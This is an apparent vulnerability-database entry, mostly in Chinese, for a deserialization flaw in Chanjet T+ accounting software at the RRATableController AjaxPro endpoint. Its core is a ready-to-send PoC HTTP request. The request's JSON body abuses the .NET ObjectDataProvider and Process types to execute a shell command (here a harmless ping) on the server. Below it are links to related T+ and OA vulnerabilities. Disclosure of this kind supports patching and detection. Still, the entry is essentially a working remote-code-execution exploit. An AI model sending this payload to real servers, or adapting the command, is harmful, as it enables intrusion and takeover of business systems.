畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController存在反序列化漏洞

日期: 2024-03-15 | 影响软件: 畅捷通T+ | POC: 已公开

漏洞描述

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController存在反序列化漏洞。

PoC代码

POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
X-Ajaxpro-Method: GetStoreWarehouseByStore
Content-Type: text/plain
Content-Length: 553

{
 "storeID":{
  "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
  "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
   "StartInfo":{
    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c ping -n 3 x"
   }
  }
 }
}

漏洞描述

PoC代码

相关漏洞推荐

畅捷通T+ ME_MemberIntegral_IntegralAdjust 存在反序列化漏洞 无POC

畅捷通T+ getdecallusers信息泄露漏洞 无POC

CNVD-2022-60632: 畅捷通T+ SetupAccount 任意文件上传 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

畅捷通T+ ME_MemberIntegral_IntegralAdjust 存在反序列化漏洞无POC

畅捷通T+ getdecallusers信息泄露漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC